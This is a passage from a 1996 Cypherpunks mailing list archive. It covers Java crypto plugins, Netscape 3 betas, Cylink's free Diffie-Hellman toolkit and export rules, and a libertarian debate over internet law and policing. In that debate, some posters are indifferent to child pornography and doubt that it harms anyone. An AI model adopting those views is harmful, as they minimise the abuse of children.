To: Alex Strasheim <cp@proust.suba.com>
Subject: Re: Calling other code in Java applications and applets
In-Reply-To: <3185E5B6.3EE8@netscape.com>
Message-ID: <3187209C.3E5B@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Alex Strasheim wrote:
> 
> >   Our Navigator 3.0 release will allow java and javascript to call into
> > plugins.  Since plugins are native code, you will be able to freely mix
> > C and Java.  Of course you will have to get the user to install your
> > plugin on their disk.
> 
> That's the problem, installing the plugin.
> 
> I (and some others, I think) was hoping that it would be possible to build
> powerful crypto applets and put them up on web pages.  That way everyone
> with a java enabled copy of Netscape could use a remailer or send crypted
> mail without having to download, install, and configure software.
> 
> If people have to download and install a plugin to use a java mixmaster
> applet, why not just download and install a native mixmaster client?
> 
> Of course there are other reasons to use java -- platform independence,
> for example.  But it's the user's ability to download and run applets just
> by jumping to a web page that has everyone excited.  With that gone (for
> crypto), java loses a lot of its lustre (again, for crypto work).

  It might be interesting to make a small plugin that just does some core
stuff like gathering entropy, mod-exp, and related stuff difficult or too
slow in java.  I mainly brought it up because people were asking about
calling native code from java.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 1 May 1996 20:48:46 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Netscape 3 betas
In-Reply-To: <199604301453.JAA06960@homeport.org>
Message-ID: <318722A5.2455@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack wrote:
> They include control of caching SSL protected docs, alerts before
> showing a cookie or submitting a form via email, control over email
> address as ftp password, and, best of all, Java and JavaScript come
> turned off by default.

  One minor correction.  Java and JavaScript are Enabled by default.
Note that the sense of the options changed from "Disable Java" to
"Enable Java".

> Nice work!

  Thanks.

> (I'll also offer a pet peeve, which is I can't refuse to accept server
> pushes, and the stop button doesn't really seem to affect them.  I
> should be able to prevent keep-alive if I don't want it.)

  Its possible that you could configure a null helper app for the
multipart/x-mixed-replace content-type, but I've not tried it, and have
no idea if it will work.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted Garrett <teddygee@visi.net>
Date: Wed, 1 May 1996 17:47:15 +0800
To: weidai@eskimo.com
Subject: Re: no-cost DH?
Message-ID: <199605010552.BAA16867@london.visi.net>
MIME-Version: 1.0
Content-Type: text/plain

-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: weidai@eskimo.com, cypherpunks@toad.com
Date: Wed May 01 01:54:44 1996
It's true as far as I can tell...
Cylink is giving away their passport gold SDK for free.  You can send mail 
to pbolton@cylink.com for more information.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMYb8p81+l8EKBK5FAQFrbQf6A5b3apVHHVPVjmOVw3/7SugmYWCmPG1E
k3CKhzgBoBldCdQmD0cf6s51yrayahXed+3iVNXvQC/y5l0dVzLY6hrge40NOfdz
v7C3frGfMciIYXJs7BYVdv305E5SN9m0GWWepo+vpNVCOLyVuq+4b8kVxQ6XUvQT
S1KFJm1Imxc0h9caTPkzflfBR8jO85ILbenlX8wDQZUUnYzMR47JRyXUyXZWX4Wn
InQT0KLF0zqf85cMS5dx93wBKof2NJYNuvSXQz4VL7kfxepQUtQON9N7E1dgWXD8
VOUqQu1KArIySBhfMW4pthJR0kJxzu+nOzhEdm/xFoYaWTUb9BEa7g==
=/8SM
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 1 May 1996 17:42:10 +0800
To: "CyberAngels Director : Colin Gabriel Hatcher" <angels@wavenet.com>
Subject: Re: Freedom and security
In-Reply-To: <v01510108a9e71a45899e@[198.147.118.163]>
Message-ID: <Pine.SUN.3.93.960501014453.614a-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 30 Apr 1996, CyberAngels Director : Colin Gabriel Hatcher wrote:

> Nor does freedom increase through less laws or no laws.  Freedom increases
> as respect and care for one another increases.

Respect maybe, but care?  Please.

> Meanwhile, since we do not
> live in utopia, all societies at a certain level of economic development
> and of a certain size of population require law and law enforcement to
> protect citizens from predators.

I disagree.  Law enforcement is only required to the extent the individual
is unable to protect him or herself from "predators."

Assuming that a certain level of economic development makes this
impossible or difficult is, in my view, a long jump.

> The Internet is beyond the stage of small communities exercising informal
> social controls (peer pressure).  It's now a major industrial city and will
> develop law, law enforcement and government, whether anyone likes it or
> not, not least because the Community will always respond to crime by trying
> to protect itself.

What you fail to recognize is that the individual is much more empowered
on the internet than in other communities.  Looking at the internet as a
community is a misnomer.  It is a community only to the extent people
engage themselves in it.

You have to live somewhere on the planet.  You can't simply unplug from
the real world.  Participation in a community is mandatory in the real
world.  Not so with 'cyberspace.'

> And the crime is already here.  The idea that the
> Internet is not controlled is IMHO one of the biggest myths around.  It's
> like a large group of people are still living in some far-off utopian rural
> paradise.  Does anyone really doubt the extent of State control and power
> across the Net?

Yes.

Louis Freeh for one.  Bill Clinton as another.  Senator Exon as a third.
Shall I go on?

> My point is that this is inevitable.

My point is that I believe you are incorrect.

> The Internet is a
> mirror of the rest of the world, not a new form of society, and I fail to
> understand why anyone should be surprised that that is the case.

Mostly because many of us don't believe it's true.  While I will agree
that one sees similarities between socializations on the internet and the
real world, making the leap to a "mirror image" is pushing it.

>  >.... laws only breed more laws, which always lead to
> >less freedom.
> 
> I disagree with this statement. I do not believe that laws breed more laws
> nor that laws lead to less freedom.  I believe bad laws compromise freedom
> (eg CDA) while good laws protect freedom.

Show me a good law that doesn't reduce freedom.  Give me one example
please.

> >>I don't believe that security is the enemy of
> >>freedom.  I believe that freedom needs security in order to exist at all.
> >
> >Good. Join us in spreading cryptography around, and security will
> >bloom (along with freedom).
> 
> Cryptography enhances and protects privacy, which does not inevitably lead
> to greater security.

Your failure to connect privacy with individual security does not commend
your argument to the reader.

> Security for the sender, yes, in that no one else can
> read the message, but security for the Community?  Doesnt that depend what
> the message said?

Since when has community security required censorship?  What you are
proposing are content based restrictions justified by the 'need' for
'community security' where the definition of 'community' is so vague as to
be meaningless and the meaning for 'security' is entirely undefined.

One might as well say:  We have to protect the hummahrmm from the hurmmms
in your message.  We're going to pass some laws to do it.

> The technology itself is neutral.  Child pornographers
> encrypt their hard drives so that law enforcement cannot gather crime
> evidence - that is certainly a state of greater security for the
> pornographer, but it does not improve our Community,

Well, that depends, again, on what your community is defined as, what you
mean by improve, the assumption that child pornography is detremental to
the community, the assumption that child pornography is a crime and the
assumption that law enforcement is really interested in reducing crime.

> and as child
> pornography increases, the law is by definition broken more and more,

Uh... so?

If I pass a law forbidding nudity at all, including in private, as
showering increases the law is by definition broken more and more and so
the community becomes less free than before.  Now, this is the fault of
the showerers, isn't it?

This is basically what you say here:

> and
> so the Community becomes less free than before.  And that's not the tyranny
> of government but the tryanny of criminals.

This is classic left-speak.  It's not the government that has taken away
rights by passing laws that take away rights, but it's the fault of the
criminals (who are ill,mal, or undefined).  Blame _them_ for your loss of
liberty.

Uh huh.

This is poor rationalization and after the fact justification.

> I do in fact support cryptography for personal security, not least because
> I can ensure that my messages are authenticated.  CyberAngels PGP public
> key will be up on our new website opening very soon.  I've had enough of
> people forging my email.

You disprove your own point.  You just struck a blow to 'criminal' mail
forgers without the help of law enforcement at all.  In fact it is despite
attempts to prevent you from using strong cryptography by legislators and
the executive that you can accomplish this.  Can you also see that your
'community' is improved by the presence of this technology which deters
criminal mail forgers?  And, imagine that, it was done without the
expenditure of tax dollars.

Or do I have to spell this out for you?

> *********************************************************
> Colin Gabriel Hatcher - CyberAngels Director
> angels@wavenet.com
> 
> "Two people may disagree, but
> that does not mean that one of them is evil"

It does, however, typically mean that at least one of them is wrong.

> *********************************************************

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted Garrett <teddygee@visi.net>
Date: Wed, 1 May 1996 18:25:03 +0800
To: perry@piermont.com
Subject: Re: no-cost DH?
Message-ID: <199605010614.CAA18159@london.visi.net>
MIME-Version: 1.0
Content-Type: text/plain

-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: perry@piermont.com, cypherpunks@toad.com
Date: Wed May 01 02:16:17 1996
Sorry, Perry.  This time you are wrong.  Cylink is giving away their 
Passport Gold SDK (Security Development Kit).  Period.  I've just recieved 
the documentation on the SDK itself, and am expecting shipment of the SDK 
itself about the middle of May.

I was skeptical myself when I read the first post regarding this SDK being 
released to the public for free, so I called up Cylink.  They promptly 
connected me with Peter Bolton <mailto:pbolton@cylink.com>, who has been 
very helpful in getting this SDK into my hot little hands.  Included is, 
and I quote:

"We hold the world-renowned Diffie-Hellman patent used in public key 
encryption.  While developing our industry-leading encryption acceleration 
engines, we also developed a full suite of services for 
Diffie-Hellman-based key exchange, government-sanctioned Data Encryption 
Standard (DES) encryption algorithms, Digital Signature Standard (DSS) 
document signatures, and the complementary functions you need to 
incorporate data security into your product.  And it's available to you for 
free: a no-cost toolkit and royalty free license."

This is the second paragraph of the fax I received from Cylink after my 
following up on the free SDK offer.  From the rest of the fax, it seems 
that provisions are included in the SDK for DH, DES, DSS, and SHA.  X.509 
appears to be in the works.  The SDK is purported to interoperate with the 
Cylink products based on the Secure Enterprise Architecture Stack.

I'm pretty dad-blamed excited about this one, boys.  I was trying to wait 
till I was sure to say anything on the list.  I'm sure.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMYcBs81+l8EKBK5FAQEfhQf+LJAytjAhEOoD0ai6K0liuyDQkWuMmAxq
z5H5KzNXBQn0F+r2ukVEPsX0Ocgfbqp5fo5lRp+hDegM9KRz+MulSmVXEQSdbUPi
6cfq7c0/HhHNkuaJK8xeTOvDlquYLmnDPJJ6KxAcTQvh3ssRJMo9YYWXIF/YlX/J
fVZunnwMY9xmIggOfoXIV6ZZvkAUsumA6EgGbKggm2HMh5X4ukWDb3qW2RkKDTlr
8pM8SPRs4IEJFzoXA1FAXafePm1tA2PXhLeOKmwjjZ4R58L6Y4l+eRRsNXIkUGrD
8iY7QUbozhTyTyzRMGzv21g2cOHmfmLblKfJsNQYWFX5yKctla7qyA==
=TklH
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 1 May 1996 17:37:18 +0800
To: cypherpunks@toad.com
Subject: (fwd) Information Infrastructure Project
Message-ID: <01I46B3WYFYS8Y54K0@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"rre@weber.ucsd.edu"  1-MAY-1996 00:50:15.50
From: Phil Agre <pagre@weber.ucsd.edu>

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE).
Send any replies to the original author, listed in the From: field below.
You are welcome to send the message along to others but please do not use
the "redirect" command.  For information on RRE, including instructions
for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: Mon, 29 Apr 1996 17:21:36 EST
>From: Tim Leshan <LESHAN@ksgrsch.harvard.edu>
To: IIPLIST@ksgrsch.harvard.edu
Subject: Workshop Announcement and Call for Papers 


               Information Infrastructure Project 
                       Harvard University 
                
         Commercial Internet Exchange Association (CIX) 
  
                        Internet Society 


        COORDINATION AND ADMINISTRATION OF THE INTERNET 
 

           Workshop Announcement and Call for Papers 
 
This is a first announcement and call for papers and proposals 
for a workshop to be held at the John F. Kennedy School of 
Government, Cambridge, MA, USA, on September 8-10, 1996. 
The workshop will address issues in the international 
coordination and management of Internet operations.  We are 
seeking papers which address the economic, organizational, 
legal and technical issues in migrating to internationally 
sanctioned, industry-supported processes and institutions. 
What should a fully internationalized Internet look like, and 
how do we get there from here? 
 
Topics to be explored in the workshop and resulting publication 
include: 
 
      - policy and management issues concerning: 
         network addresses 
         domain names 
         routing policy 
         settlements 
         interconnect points 
         intercontinental connectivity 
         quality of service standards 
 
      - legal and institutional structures for supporting core 
       Internet functions; 
       
      - institutions and policies needed to ensure the future 
       scalability and extensibility of the Internet; 
       
      - technical and implementation issues presented by 
       heterogeneous national information policies; 
       
      - the need for data in support of Internet planning, 
       including issues of how data should be collected and 
       maintained; 
       
      - coordination needed for the deployment of new 
       technology; 

      - international crisis management for the Internet. 
       
Although the Internet is already substantially privatized, 
certain essential functions -- notably the domain name 
registry, network number assignment, and the routing arbiter -- 
are still funded by the U.S. Government.  Unlike the local 
telephone exchange, these integrative services are managed by 
third parties, contributing to an open competitive environment 
which has helped enable rapid growth of the Internet.  Rapid 
growth, commercialization, and internationalization are putting 
stress on current institutions and procedures -- which are 
neither self-sustaining nor officially recognized at the 
international level.  The National Science Foundation plans to 
phase out support for core administrative services and for 
international connections, just as it has withdrawn support for 
production-level backbone services.  Conflicts over tradenames 
and number assignments suggest that international legitimacy is 
needed for domain name and network number management. 
 
Beyond support for essential functions, there are many 
practical and policy issues where some greater degree of 
coordination or institutional leadership may be desirable.  For 
example, how can the implementation of new technology and 
protocols be expedited? What common definitions and guidelines 
should exist to describe network performance?  Should the 
functions performed by current Internet institutions (such as 
the Internic, RIPE, APNIC, and the IANA) be brought into a more 
robust international infrastructure, and if so, how?  To what extent 
are multilateral peering arrangements and settlements needed to 
encourage continued growth and competition in the Internet 
access industry? 
 
The conference will engage scholars, practitioners and policy 
makers in examining and discussing these issue.  It will bring 
together stake-holders, academics and individual leaders within 
and beyond the Internet community to help define the future 
institutional infrastructure of the Internet. 
 
Workshop papers will be revised and edited following the 
workshop for publication by MIT Press as part of the Harvard 
Information Infrastructure Project series.  Potential 
participants are encouraged to submit papers that can be 
developed and revised for publication (copyright assignment is 
not required).  Please send an abstract by June 15, 1996, for 
review by the program committee. 
 
Please direct papers, proposals, and requests for future 
mailings to: 
 
James Keller 
Information Infrastructure Project 
Kennedy School of Government, Harvard University 
79 JFK Street 
Cambridge, MA  02138 
617-496-4042; Fax: 617-495-5776 
jkeller@harvard.edu 
 
The Harvard Information Infrastructure Project is a project 
in the Science, Technology and Public Policy Program at the 
John F. Kennedy  School of Government, with associated 
activities at the Kennedy School's Center for Business and 
Government and the Institute for Information Technology Law 
and Policy at Harvard Law School.  This event and publication
are funded in part by a grant from the National Science 
Foundation, Division of Networking and Communications Research 
and Infrastructure.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Will French <wfrench@interport.net>
Date: Wed, 1 May 1996 18:25:00 +0800
To: cypherpunks@toad.com
Subject: Re: Lolitas and Cyber Angels
Message-ID: <199605010716.DAA12911@interport.net>
MIME-Version: 1.0
Content-Type: text/plain


Mike Duvos wrote:

> Someone who has an encrypted file on their hard drive from
> some motheaten child porn magazine published 20 years ago is
> no more guilty of the exploitation of the models portrayed
> than someone who downloads the Simpson crime scene photos from
> alt.binaries.pictures.tasteless is guilty of killing Nicole
> and Ron.

  I disagree.  If (quite hypothetically) I were one of the
"models" in such a magazine (I'm 27 now, so I would have been 7
at the time it was published), I would certainly consider anyone
posessing a copy, today or 20 years ago, to be exploiting me.

  However, that doesn't mean I would want them criminalized for
it.  In fact, my "anyone possessing a copy" above includes the
Government (and third parties such as the Guardian Angels) in
the course of a kiddie-porn investigation/prosecution.  It's a
very hard question.

  And yes, people who download Simpson crime scene photos are
exploiting (not killing) Nicole and Ron.  When I have been shown
these photos, I have quickly averted my eyes. This is simple
human decency, not to mention respect for the dead.


Will French  <wfrench@interport.net>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Blake <grafolog@netcom.com>
Date: Wed, 1 May 1996 16:23:03 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Former CIA Director and *Strategic Investment* Editor
In-Reply-To: <m0uEN3x-00091PC@pacifier.com>
Message-ID: <Pine.3.89.9605010414.A3670-0100000@netcom13>
MIME-Version: 1.0
Content-Type: text/plain



	Jim:

On Tue, 30 Apr 1996, jim bell wrote:

> known to be so!) that his neighbor would call the cops just because he, 
> ONCE, stayed a little longer than normal?

	I guess you've never had the pleasure of living in a small town.
	If you had, you'd know just how observant people are, of others
	habits.  

> What's wrong with this picture?

	You ability to see conspiracy where there may be non.

        xan

        jonathon
        grafolog@netcom.com

	


**********************************************************************
*								     *
*	Opinions expressed don't necessarily reflect my own views.   *
*								     *
*	There is no way that they can be construed to represent      *
*	any organization's views.				     *
*								     *
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
*	ftp://ftp.netcom.com/pub/gr/graphology/home.html	     *
*								     *
*			     OR					     *
*								     *
*       http://members.tripod.com/~graphology/index.html             *
*								     *
***********************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 1 May 1996 20:34:15 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Freedom and security
In-Reply-To: <199605010250.WAA15372@jekyll.piermont.com>
Message-ID: <Pine.SUN.3.93.960501041802.614e-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 30 Apr 1996, Perry E. Metzger wrote:

> Mr. Hatcher wrote:

> > Or that child pornography is a world wide trading game?
> 
> I must admit to having an odd viewpoint. I don't particularly care
> about child pornography. Our nation seems to have an obsession with
> the notion that somewhere out there someone is looking at a picture of
> a naked boy or something. Myself, well, I am far from convinced that
> the existance of child pornography is nearly as much of a threat to me
> as the people who want to dismantle all our freedoms in order to stop
> it. Most of the child pornography in the U.S. is distributed by the
> FBI during stings, you know.

>From what I can tell, your viewpoint is hardly odd.  I find child
pornography distasteful in a vague and general way, but I am otherwise
farily indifferent.

This pattern that Mr. Hatcher is showing, demonize an act then show shock
when no one else responds to the propaganda; followup by demonizing those
not shocked by the demonized act, is a fairly classic tactic.  See
e.g., Atwood, Orwell, Cambodia.

> > Have you never heard of email forgeries or impersonation?
> 
> Yes. I also happen to have heard that people can impersonate you in
> real life, too.
> 
> > What about tthe victims of harassment and hatred who don't know how
> > to deal with it?  What about all the people who have never heard of
> > killfiles?
> 
> I suppose they will have to learn, won't they?

But Mr. Metzger, that requires _effort_ and decision making.  We must save
the people from _effort_ and decision making because only _we_ the elite, 
know what is good for them.

> > Maybe you feel like a veterano and can afford to look condesendingly at all
> > the thousands of fresh-faced netizens just arriving online and say "well if
> > they can't take the heat they should stay out of the fire" - but if we are
> > to call ourselves an emerging "community" then we must take responsibility
> > for our city, and that means caring about other people's problems.

You mean telling other people the only way to solve their problems as if
they are unable to do so themselves, or as if other solutions having
nothing to do with yours do not exist.

By the way, who said we want to call ourselves an emerging 'community' ?

> > When your address is forged and you get flamed and bombed, or if you start
> > receiving anonymous death threats, your freedom is under threat.  It's not
> > enough to say "Well I just turn off my monitor"

Readers will note a familiar tactic.  "Parade of horrors."  The advocate
will pass a series of examples intended to shock and frighten the reader
into accepting the next convenient solution to these problems, which is
coincidently provided by the advocate.

Readers who have any kind of tie to the real world will note that all
these horrors aren't even particularly disturbing and that this betrays
poor advocacy skills.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 1 May 1996 23:09:23 +0800
To: perry@piermont.com
Subject: Re: Freedom and security
Message-ID: <2.2.32.19960501105911.00d4f16c@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:38 PM 4/30/96 -0700, CyberAngels Director : Colin Gabriel Hatcher wrote:
>

>Maybe you feel like a veterano and can afford to look condesendingly at all
>the thousands of fresh-faced netizens just arriving online and say "well if
>they can't take the heat they should stay out of the fire" - but if we are
>to call ourselves an emerging "community" then we must take responsibility
>for our city, and that means caring about other people's problems.
>
>The internet is not just a collection of bits and bytes - it's real people
>doing real things to each other.
>
>When your address is forged and you get flamed and bombed, or if you start
>receiving anonymous death threats, your freedom is under threat.  It's not
>enough to say "Well I just turn off my monitor"

If these millions of the "Great Unwashed" managed to get *on* the Net in the
first place without Fascist assistance, they can figure out how to survive
there without Fascist assistance.  

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peng-chiew low <pclow@pc.jaring.my>
Date: Wed, 1 May 1996 15:22:22 +0800
To: cypherpunks@toad.com
Subject: [Fwd: Cylink can export 128-bit DH?]
Message-ID: <3186D86C.49C@pc.jaring.my>
MIME-Version: 1.0
Content-Type: message/rfc822


To: Wei Dai <weidai@eskimo.com>
Subject: Cylink can export 128-bit DH?
From: peng-chiew low <pclow@pc.jaring.my>
Date: Wed, 01 May 1996 10:16:17 +0700
CC: cypherpunks@taod.com
References: <Pine.SUN.3.93.960430130125.8652A-100000@eskimo.com>

Wei Dai wrote:
> Does anyone know more about these no-cost licenses?  I wouldn't mind
> getting free DH a year early...

Dear Wei Dai
I understand that ITAR prohibits the export of strong crypto
and that is why I was puzzled that Ms Glenda Barnes, the Director
of Marketing in Cylink, said that Cylink could export the same crypto
(i.e. DES) that was used in the U.S. to local banks here in Malaysia.
She also claimed that Cylink could also export a 128-bit DH key size.
(is it strong enough in the first place? )

I'm confused : Either she's pulling wool over the attendees' eyes or
Cylink has got some pretty good connections.

She could not have been mistaken as she was replying to a specific 
question about the ITAR and the export issue of strong crypto.

Can anyone help?







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cpunk@remail.ecafe.org (ECafe Anonymous Remailer)
Date: Wed, 1 May 1996 22:00:55 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Re: Freedom and security
Message-ID: <199605011003.LAA03456@pangaea.hypereality.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Apr 30 1996 at 19:38:55, angels@wavenet.com wrote:
> If it were permitted to kill those who disagreed with you,
> then no one would be free to speak their mind at all, for fear
> of the consequences.

A person's freedom of speech is reduced by being afraid of the
consequences of that speech. Likewise, a person's freedom of speech
is improved by being less afraid of the consequences.

Therefor, we can scrap the first amendment, and just drink plenty
of beer.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@sos.sll.se>
Date: Wed, 1 May 1996 23:13:04 +0800
To: cypherpunks@toad.com
Subject: Re: Churchill Club: 20th Anniversary PK Crypto
In-Reply-To: <199605010641.XAA05552@netcom9.netcom.com>
Message-ID: <Pine.HPP.3.91.960501122647.2811B-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 30 Apr 1996, Bill Frantz wrote:

> >   ...  The post office brings four things that private
> >   industry can't: ... (2) ... well established reputation, ...
> >   (4) it can act as a trusted third party.

> I just report them like I hear them.  They are priced higher
> than Verisign too.

According to your report, the guy made a comparison to MacDonalds,
having only 10.000 outfits in the US compared to the Post Office
having 50.000. But MacDonalds has a strong international presence
while the US Post Office has almost none. And then one could eat
a tasty burger, waiting for one's smartcards to get signed by the
trustworthy attendants (I mean, they do where uniforms).

Asgaard





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rbersten@ia.com.au (Rosanne Bersten)
Date: Wed, 1 May 1996 17:46:56 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Former CIA Director and *Strategic Investment* Editor
Message-ID: <v01540a04adacb10793eb@[203.8.88.46]>
MIME-Version: 1.0
Content-Type: text/plain


Has anyone else seen the extraordinarily tasteless press release sent out
by Roadshow New media about this?

Let me show you:

                               MEDIA RELEASE

30/4/96

                           Where is William Colby?

Rescuers are searching for the former head of the CIA, William Colby, after
his mysterious disappearance yesterday. The canoe he had been using was
found capsized and abandoned, near his Maryland home.

Ironically, Colby's disappearance co-incides with the current release of
Spycraft, the CD-ROM game developed with former KGB Major general Oleg
Kalugin.

...

Is this a publicity stunt from the game's US manufacturer [Activision]?
Were some of the secrets given away in the game just a little too close for
comfort for the current heads of the CIA? Are the Russians involved? Is it
just totally coincidental?

Does the Spycraft game itself hold any answers? No doubt police will be
looking to the game for clues and have not yet ruled out foul play.

Colby and Kalugin both portray themselves within the game and it could
prove that Colby solves his own mystery.

Spycraft the game is a true-to-life espionage thriller that allows players
to experience the danger and excitement of being a real spy caught in a
deadly web of international intrigue. Every game element is taken from
real-life experience of spymasters Colby and Kalugin. the high level
involvement of these espionage experts required that the script be reviewed
by the CIA for security clearance.

This real life twist to the CD ROM game offers more intrigue for gamers.
the Internet facility may provide a solution as players across the world
ponder Colby's disappearance.

[This is followed by contact details for Roadshow, which, for you
non-Australians, is a big games distributor out here]

*-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-*
+ Rosanne Bersten (editor@ia.com.au) - Editor, internet.au magazine +
+  tel: +61 2 310 1433 * fax: +61 2 310 1315 * http://www.ia.com.au +
*-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-*






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Thu, 2 May 1996 02:33:03 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: [LONG] Churchill Club: 20th Anniversary PK Crypto
In-Reply-To: <199604300808.BAA17923@netcom9.netcom.com>
Message-ID: <v03006701adacdef86414@[192.187.167.52]>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3941.1071713573.multipart/signed"

--Boundary..3941.1071713573.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

Nice summary, Bill. Now I don't have to do it. ;) I hope this is OK with you...

 <http://www.well.com/user/ddt/crypto/pkc-daddies.html>

   dave




--Boundary..3941.1071713573.multipart/signed
Content-Type: application/octet-stream; name="pgp00000.pgp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pgp00000.pgp"
Content-Description: "PGP signature"

LS0tLS1CRUdJTiBQR1AgU0lHTkFUVVJFLS0tLS0KVmVyc2lvbjogMi42LjMK
Q29tbWVudDogVmVyYnVtIHNhcGllbnRpIHNhdGlzIGVzdC4KCmlRQ1ZBd1VB
TVlkWjk2SEJPRjlLcndEbEFRSGt2Z1AvWkxNTmlpczBjVlZ1cmdDYVJ1RU9o
QkhZOHlqMnNYbzUKN0FUYWViaVdHTlhhQ29VT3drWDhWQytRSC9JTnFKYmUz
bWluaHpsNTBjNDBtS2tYN2RSOXJkb0x5SVNBalV4QgpKY0JDaDlyNDY4dmR1
OVNwWEQvZEhtdlVYcm9sZHYxZzRQbm5PcDNiekxhVVdPVWNXMWlrdmRFU2Vj
UnhLS3l6CnJjcno5RnZ5NjdjPQo9cHN6ZwotLS0tLUVORCBQR1AgU0lHTkFU
VVJFLS0tLS0K
--Boundary..3941.1071713573.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Thu, 2 May 1996 02:46:24 +0800
To: <cypherpunks@toad.com>
Subject: partial NSA key detected on USPS site
Message-ID: <v03006701adacfed6dbff@[192.187.167.52]>
MIME-Version: 1.0
Content-Type: text/plain


Is it too late for April, fooles?
<http://www.usps.gov/images/stamps/96/comp.gif>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Thu, 2 May 1996 03:14:21 +0800
To: angels@wavenet.com (CyberAngels Director : Colin Gabriel Hatcher)
Subject: Re: Freedom and security
Message-ID: <199605011155.HAA41660@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

CyberAngels Director Colin Gabriel Hatcher wrote:

<snips>

>>...Freedom does not increase through more laws.
>
>Nor does freedom increase through less laws or no laws.

You have gotta be kidding me, but let's start by differentiating
among laws. I'm a crypto-minarchist, not a crypto-anarchist, so
I still have hope for some (MUCH less) government. I think laws
against murder are good, and lead to more safety for those not in
jail. I think laws against "consensual crimes" are bad, and lead
to government/police corruption extending all the way to the top
[see sigfile]. When I have to say, "where's the victim?" it's a
shitty law. Many laws fail my test.

>  Freedom increases
>as respect and care for one another increases.

This is what I called flowery rhetoric in the last post.

>  Meanwhile, since we do not
>live in utopia, all societies at a certain level of economic development
>and of a certain size of population require law and law enforcement to
>protect citizens from predators.

This is what astounds me, the advocates of more government always
focus on crimes WITH obvious victims during debates. Once power
is achieved, the victimless crime laws get written. I have said
I do want murderers, and even some (not all) pedophiles, in jail.
If a child pornographer chooses to visit my page and commits a
